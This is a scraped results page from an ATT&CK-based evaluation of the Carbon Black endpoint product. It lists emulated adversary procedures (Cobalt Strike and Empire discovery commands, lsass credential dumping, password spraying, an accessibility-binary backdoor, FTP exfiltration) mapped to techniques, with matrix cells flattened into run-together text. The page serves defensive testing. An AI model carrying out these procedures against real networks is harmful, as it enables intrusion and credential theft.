Home  >  Evaluations  >  CarbonBlack
Response
Carbon Black
Tags:    


CarbonBlack Summary Matrix Page Information

The ATT&CK matrix is a summary of the evaluation. The cells with dark text are the techniques in scope for the evaluation. Roll over a technique for a summary of how it was tested, including the procedure name, the step of the operational flow, and the detection types associated each procedure’s detection(s).

Detection types are defined in the legend. Within the rollover, adjoining detection types are a single detection, and whitespace separates different detections.

Example: The detection below, for the procedure WinRAR has two detections. The first detection is telemetry which was tainted. The second is a specific behavior.


Vendor Configuration

Legend
Main Detection Categories:

None

Telemetry

Indicator of Compromise

General Behavior

Specific Behavior

Enrichment
Detection Modifiers:

Tainted

Delayed

Configuration Change

Matrix Summary All Results     JSON     Legend
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Drive-by CompromiseAppleScript.bash_profile and .bashrcAccess Token Manipulation
Step Procedure Detection
3.A.1 Cobalt Strike: Built-in UAC bypass token duplication capability executed to modify current process token
5.B.1 Cobalt Strike: Built-in token theft capability executed to change user context to George
2 Result(s)
Access Token Manipulation
Step Procedure Detection
3.A.1 Cobalt Strike: Built-in UAC bypass token duplication capability executed to modify current process token
5.B.1 Cobalt Strike: Built-in token theft capability executed to change user context to George
2 Result(s)
Account ManipulationAccount Discovery
Step Procedure Detection
2.G.1 Cobalt Strike: 'net user /domain' via cmd
,
2.G.2 Cobalt Strike: 'net user george /domain' via cmd
,
7.A.1 Microsoft Management Console (Local Users and Groups snap-in) GUI utility displayed user account information
12.G.1 Empire: 'net user' via PowerShell
,
12.G.2 Empire: 'net user /domain' via PowerShell
,
5 Result(s)
AppleScriptAudio CaptureAutomated ExfiltrationCommonly Used Port
Step Procedure Detection
1.C.1 Cobalt Strike: C2 channel established using port 53
6.B.1 Cobalt Strike: C2 channel modified to use port 80
,
11.B.1 Empire: C2 channel established using port 443
,
14.A.1 Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over port 8080
4 Result(s)
Exploit Public-Facing ApplicationCMSTPAccessibility Features
Step Procedure Detection
17.C.1 Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
,
20.A.1 magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
, , ,
2 Result(s)
Accessibility Features
Step Procedure Detection
17.C.1 Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
,
20.A.1 magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
, , ,
2 Result(s)
BITS JobsBash HistoryApplication Window Discovery
Step Procedure Detection
8.C.1 Cobalt Strike: Keylogging capability included residual enumeration of application windows
15.A.1 Empire: Built-in keylogging module included residual enumeration of application windows
2 Result(s)
Application Deployment SoftwareAutomated CollectionData Compressed
Step Procedure Detection
19.B.1 Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
,
1 Result(s)
Communication Through Removable Media
Hardware AdditionsCommand-Line Interface
Step Procedure Detection
16.F.1 Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick 
,
1 Result(s)
Account ManipulationAppCert DLLsBinary PaddingBrute Force
Step Procedure Detection
16.A.1 Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
, 
16.B.1 Empire: Successful authentication to Conficker (10.0.0.5) using credentials of user Kmitnick as a result of the brute force password spraying
, 
2 Result(s)
Browser Bookmark DiscoveryDistributed Component Object ModelClipboard Data
Step Procedure Detection
12.E.1.5 Empire: WinEnum module included enumeration of clipboard contents
1 Result(s)
Data Encrypted
Step Procedure Detection
19.B.1 Empire: Executed binary (recycler.exe) created encrypted archive (old.rar) of previously collected file
,
1 Result(s)
Connection Proxy
Replication Through Removable MediaCompiled HTML FileAppCert DLLsAppInit DLLsBypass User Account Control
Step Procedure Detection
3.A.1 Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
14.A.1 Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level
2 Result(s)
Credential Dumping
Step Procedure Detection
5.A.1 Cobalt Strike: Built-in Mimikatz credential dump capability executed
,
5.A.2 Cobalt Strike: Built-in hash dump capability executed
2 Result(s)
File and Directory Discovery
Step Procedure Detection
8.A.1 Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
,
8.A.2 Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
,
9.A.1 Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
12.E.1.4.1 Empire: WinEnum module included enumeration of recently opened files
12.E.1.4.2 Empire: WinEnum module included enumeration of interesting files
16.K.1 Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
18.A.1 Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
7 Result(s)
Exploitation of Remote ServicesData Staged
Step Procedure Detection
18.B.1 Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
,
1 Result(s)
Data Transfer Size LimitsCustom Command and Control Protocol
Spearphishing AttachmentControl Panel ItemsAppInit DLLsApplication ShimmingCMSTPCredentials in Files
Step Procedure Detection
15.B.1 Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
1 Result(s)
Network Service ScanningLogon ScriptsData from Information RepositoriesExfiltration Over Alternative Protocol
Step Procedure Detection
19.C.1 Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel
,
1 Result(s)
Custom Cryptographic Protocol
Spearphishing LinkDynamic Data ExchangeApplication ShimmingBypass User Account Control
Step Procedure Detection
3.A.1 Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
14.A.1 Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level
2 Result(s)
Clear Command HistoryCredentials in RegistryNetwork Share Discovery
Step Procedure Detection
12.E.1.9.1 Empire: WinEnum module included enumeration of available shares
12.E.1.9.2 Empire: WinEnum module included enumeration of mapped network drives
2 Result(s)
Pass the HashData from Local SystemExfiltration Over Command and Control Channel
Step Procedure Detection
9.B.1 Cobalt Strike: Download capability exfiltrated data through existing C2 channel
1 Result(s)
Data Encoding
Step Procedure Detection
1.C.1 Cobalt Strike: C2 channel established using both NetBIOS and base64 encoding
1 Result(s)
Spearphishing via ServiceExecution through APIEnabling Technique: Not directly testedAuthentication PackageDLL Search Order HijackingCode SigningExploitation for Credential AccessNetwork SniffingPass the TicketData from Network Shared Drive
Step Procedure Detection
9.B.1 Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
18.B.1 Empire: 'copy' via PowerShell collected a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
2 Result(s)
Exfiltration Over Other Network MediumData Obfuscation
Supply Chain CompromiseExecution through Module LoadBITS JobsDylib HijackingCompiled HTML FileForced AuthenticationPassword Policy Discovery
Step Procedure Detection
12.E.1.3 Empire: WinEnum module included enumeration of password policy information
1 Result(s)
Remote Desktop Protocol
Step Procedure Detection
6.C.1 Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
,
10.B.1 RDP connection made to Conficker (10.0.0.5) as part of execution of persistence mechanism
,
20.A.1 RDP connection made to Creeper (10.0.0.4) as part of execution of persistence mechanism
3 Result(s)
Data from Removable MediaExfiltration Over Physical MediumDomain Fronting
Trusted RelationshipExploitation for Client ExecutionBootkitExploitation for Privilege EscalationComponent FirmwareHookingPeripheral Device DiscoveryRemote File Copy
Step Procedure Detection
7.B.1 Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
14.A.1 Empire: UAC bypass module downloaded and wrote a new Empire stager (wdbypass) to disk
16.E.1 Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
16.G.1 Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
19.A.1 Empire: Built-in upload module executed to write binary (recycler.exe) to disk on CodeRed (10.0.1.5)
5 Result(s)
Email CollectionScheduled TransferFallback Channels
Valid AccountsGraphical User Interface
Step Procedure Detection
7.A.1 Microsoft Management Console (Local Users and Groups snap-in) GUI utility used to add new user through RDP connection
1 Result(s)
Browser ExtensionsExtra Window Memory InjectionComponent Object Model HijackingInput Capture
Step Procedure Detection
8.C.1 Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
15.A.1 Empire: Built-in keylogging module executed to capture keystrokes of user Bob
,
2 Result(s)
Permission Groups Discovery
Step Procedure Detection
2.F.1 Cobalt Strike: 'net localgroup administrators' via cmd
,
2.F.2 Cobalt Strike: 'net localgroup administrators /domain' via cmd
,
2.F.3 Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
,
12.E.1.2 Empire: WinEnum module included enumeration of AD group memberships
12.F.1 Empire: 'net group "Domain Admins" /domain' via PowerShell
,
12.F.2 Empire: 'net localgroup administrators' via PowerShell
,
6 Result(s)
Remote ServicesInput Capture
Step Procedure Detection
8.C.1 Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
15.A.1 Empire: Built-in keylogging module executed to capture keystrokes of user Bob
,
2 Result(s)
Multi-Stage Channels
InstallUtilChange Default File AssociationFile System Permissions WeaknessControl Panel ItemsInput PromptProcess Discovery
Step Procedure Detection
2.C.1 Cobalt Strike: 'ps' (Process status) via Win32 APIs
2.C.2 Cobalt Strike: 'tasklist /v' via cmd
,
3.B.1 Cobalt Strike: 'ps' (Process status) via Win32 APIs
8.B.1 Cobalt Strike: 'ps' (Process status) via Win32 APIs
12.C.1 Empire: 'qprocess *' via PowerShell
,
5 Result(s)
Replication Through Removable MediaMan in the BrowserMulti-hop Proxy
LSASS DriverComponent FirmwareHookingDCShadowKerberoastingQuery Registry
Step Procedure Detection
2.H.1 Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
,
6.A.1 Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
,
12.E.1.7 Empire: WinEnum module included enumeration of system information via a Registry query
13.C.1 Empire: 'reg query' via PowerShell to enumerate a specific Registry key
,
17.A.1 Empire: 'reg query' via PowerShell to enumerate a specific Registry key
,
5 Result(s)
SSH HijackingScreen Capture
Step Procedure Detection
8.D.1 Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
1 Result(s)
Multiband Communication
Step Procedure Detection
6.B.1 Cobalt Strike: C2 channel modified to split communications between both HTTP and DNS
1 Result(s)
LaunchctlComponent Object Model HijackingImage File Execution Options InjectionDLL Search Order HijackingKeychainRemote System Discovery
Step Procedure Detection
4.A.1 Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
,
4.A.2 Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
,
13.A.1 Empire: 'net group "Domain Computers" /domain' via PowerShell
,
3 Result(s)
Shared WebrootVideo CaptureMultilayer Encryption
Local Job SchedulingCreate Account
Step Procedure Detection
7.A.1 Added user Jesse to Conficker (10.0.0.5) through RDP connection
, 
1 Result(s)
Launch DaemonDLL Side-LoadingLLMNR/NBT-NS PoisoningSecurity Software Discovery
Step Procedure Detection
12.E.1.10.1 Empire: WinEnum module included enumeration of AV solutions
12.E.1.10.2 Empire: WinEnum module included enumeration of firewall rules
2 Result(s)
Taint Shared ContentPort Knocking
MshtaDLL Search Order HijackingNew Service
Step Procedure Detection
16.I.1 Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
,
1 Result(s)
Deobfuscate/Decode Files or InformationNetwork SniffingSystem Information Discovery
Step Procedure Detection
2.E.1 Cobalt Strike: 'systeminfo' via cmd
,
2.E.2 Cobalt Strike: 'net config workstation' via cmd
,
12.E.1.6.1 Empire: WinEnum module included enumeration of system information
12.E.1.6.2 Empire: WinEnum module included enumeration of Windows update information
4 Result(s)
Third-party SoftwareRemote Access Tools
PowerShellEnabling Technique: Not directly testedDylib HijackingPath InterceptionDisabling Security ToolsPassword Filter DLLSystem Network Configuration Discovery
Step Procedure Detection
2.A.1 Cobalt Strike: 'ipconfig /all' via cmd
,
2.A.2 Cobalt Strike: 'arp -a' via cmd
,
4.B.1 Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
,
12.A.1 Empire: 'route print' via PowerShell
12.A.2 Empire: 'ipconfig /all' via PowerShell
,
12.E.1.11 Empire: WinEnum module included enumeration of network adapters
6 Result(s)
Windows Admin Shares
Step Procedure Detection
16.A.1 Empire: Brute force password spraying attempts targeted Windows admin shares on Morris (10.0.1.4) and Nimda (10.0.1.6)
,
16.B.1 Empire: Successful authentication targeted Windows admin share on Conficker (10.0.0.5) 
,
16.D.1 Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
,
3 Result(s)
Remote File Copy
Step Procedure Detection
7.B.1 Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
14.A.1 Empire: UAC bypass module downloaded and wrote a new Empire stager (wdbypass) to disk
16.E.1 Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
16.G.1 Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
19.A.1 Empire: Built-in upload module executed to write binary (recycler.exe) to disk on CodeRed (10.0.1.5)
5 Result(s)
Regsvcs/RegasmExternal Remote ServicesPlist ModificationExploitation for Defense EvasionPrivate KeysSystem Network Connections Discovery
Step Procedure Detection
4.C.1 Cobalt Strike: 'netstat -ano' via cmd
,
12.E.1.12 Empire: WinEnum module included enumeration of established network connections
,
13.B.1 Empire: 'net use' via PowerShell
,
13.B.2 Empire: 'netstat -ano' via PowerShell
,
4 Result(s)
Windows Remote ManagementStandard Application Layer Protocol
Step Procedure Detection
1.C.1 Cobalt Strike: C2 channel established using DNS traffic to freegoogleadsenseinfo.com
6.B.1 Cobalt Strike: C2 channel modified to use HTTP traffic to freegoogleadsenseinfo.com
11.B.1 Empire: C2 channel established using HTTPS traffic to freegoogleadsenseinfo.com
14.A.1 Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over HTTP
4 Result(s)
Regsvr32File System Permissions WeaknessPort MonitorsExtra Window Memory InjectionSecurityd MemorySystem Owner/User Discovery
Step Procedure Detection
2.B.1 Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
12.B.1 Empire: 'whoami /all /fo list' via PowerShell
,
12.E.1.1 Empire: WinEnum module included enumeration of user information
20.B.1 Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
,
4 Result(s)
Standard Cryptographic Protocol
Step Procedure Detection
11.B.1 Empire: Encrypted C2 channel established using HTTPS
1 Result(s)
Rundll32
Step Procedure Detection
1.A.1 Previously executed batch file (pdfhelper.cmd) launched a DLL payload (update.dat) using Rundll32
,
1 Result(s)
Hidden Files and DirectoriesProcess Injection
Step Procedure Detection
3.C.1 Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
,
5.A.1 Cobalt Strike: Credential dump capability involved process injection into lsass
5.A.2 Cobalt Strike: Hash dump capability involved process injection into lsass.exe
,
8.D.1 Cobalt Strike: Screen capture capability involved process injection into explorer.exe
4 Result(s)
File Deletion
Step Procedure Detection
19.D.1 Empire: 'del C:\"$"Recycle.bin\old.rar'
19.D.2 Empire: 'del recycler.exe'
2 Result(s)
Two-Factor Authentication InterceptionSystem Service Discovery
Step Procedure Detection
2.D.1 Cobalt Strike: 'sc query' via cmd
,
2.D.2 Cobalt Strike: 'net start' via cmd
,
12.D.1 Empire: 'net start' via PowerShell
12.E.1.8 Empire: WinEnum module included enumeration of services
16.H.1 Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
,
16.J.1 Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
,
17.A.1 Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
7 Result(s)
Standard Non-Application Layer Protocol
Scheduled Task
Step Procedure Detection
7.C.1 Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
,
10.A.2 Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
2 Result(s)
HookingSID-History InjectionFile Permissions Modification
Step Procedure Detection
17.B.1 Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
, 
17.B.2 Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
, 
2 Result(s)
System Time DiscoveryUncommonly Used Port
Scripting
Step Procedure Detection
1.A.1 Previously executed self-extracting archive (Resume Viewer.exe) launched an embedded batch file (pdfhelper.cmd)
,
11.A.1 Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
, , ,
12.E.1 Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
3 Result(s)
HypervisorScheduled Task
Step Procedure Detection
7.C.1 Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
,
10.A.2 Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
2 Result(s)
File System Logical OffsetsWeb Service
Service Execution
Step Procedure Detection
16.L.1 Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
1 Result(s)
Image File Execution Options InjectionService Registry Permissions WeaknessGatekeeper Bypass
Signed Binary Proxy ExecutionKernel Modules and ExtensionsSetuid and SetgidHISTCONTROL
Signed Script Proxy ExecutionLC_LOAD_DYLIB AdditionStartup ItemsHidden Files and Directories
SourceLSASS DriverSudo CachingHidden Users
Space after FilenameLaunch AgentSudoHidden Window
Third-party SoftwareLaunch DaemonValid Accounts
Step Procedure Detection
10.B.1 RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
,
16.B.1 Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
16.D.1 Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick
3 Result(s)
Image File Execution Options Injection
TrapLaunchctlWeb ShellIndicator Blocking
Trusted Developer UtilitiesLocal Job SchedulingIndicator Removal from Tools
User Execution
Step Procedure Detection
1.A.1 Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
,
1 Result(s)
Login ItemIndicator Removal on Host
Windows Management InstrumentationLogon ScriptsIndirect Command Execution
Windows Remote ManagementModify Existing ServiceInstall Root Certificate
XSL Script ProcessingNetsh Helper DLLInstallUtil
New Service
Step Procedure Detection
16.I.1 Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
,
1 Result(s)
LC_MAIN Hijacking
Office Application StartupLaunchctl
Path InterceptionMasquerading
Step Procedure Detection
16.I.1 Empire: 'sc description' via PowerShell to remotely disguise a service on Creeper (10.0.0.4)
19.A.1 Empire: File dropped to disk is a renamed copy of the WinRAR binary
19.B.1 Empire: Executed binary (recycler.exe) is a renamed copy of the WinRAR binary
,
3 Result(s)
Plist ModificationModify Registry
Port KnockingMshta
Port MonitorsNTFS File Attributes
Rc.commonNetwork Share Connection Removal
Step Procedure Detection
16.C.1 Empire: 'net use /delete' via PowerShell
,
1 Result(s)
Re-opened ApplicationsObfuscated Files or Information
Redundant AccessPlist Modification
Registry Run Keys / Startup Folder
Step Procedure Detection
1.B.1 Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
,
10.A.1 Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
2 Result(s)
Port Knocking
SIP and Trust Provider HijackingProcess Doppelgänging
Scheduled Task
Step Procedure Detection
7.C.1 Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
,
10.A.2 Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
2 Result(s)
Process Hollowing
ScreensaverProcess Injection
Step Procedure Detection
3.C.1 Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
,
5.A.1 Cobalt Strike: Credential dump capability involved process injection into lsass
5.A.2 Cobalt Strike: Hash dump capability involved process injection into lsass.exe
,
8.D.1 Cobalt Strike: Screen capture capability involved process injection into explorer.exe
4 Result(s)
Security Support ProviderRedundant Access
Service Registry Permissions WeaknessRegsvcs/Regasm
Setuid and SetgidRegsvr32
Shortcut ModificationRootkit
Startup ItemsRundll32
Step Procedure Detection
1.A.1 Previously executed batch file (pdfhelper.cmd) launched a DLL payload (update.dat) using Rundll32
,
1 Result(s)
System FirmwareSIP and Trust Provider Hijacking
Time ProvidersScripting
Step Procedure Detection
1.A.1 Previously executed self-extracting archive (Resume Viewer.exe) launched an embedded batch file (pdfhelper.cmd)
,
11.A.1 Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
, , ,
12.E.1 Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
3 Result(s)
TrapSigned Binary Proxy Execution
Valid Accounts
Step Procedure Detection
10.B.1 RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
,
16.B.1 Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
16.D.1 Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick
3 Result(s)
Signed Script Proxy Execution
Web ShellSoftware Packing
Windows Management Instrumentation Event SubscriptionSpace after Filename
Winlogon Helper DLLTemplate Injection
Timestomp
Trusted Developer Utilities
Valid Accounts
Step Procedure Detection
10.B.1 RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
,
16.B.1 Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
16.D.1 Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick
3 Result(s)
Web Service
XSL Script Processing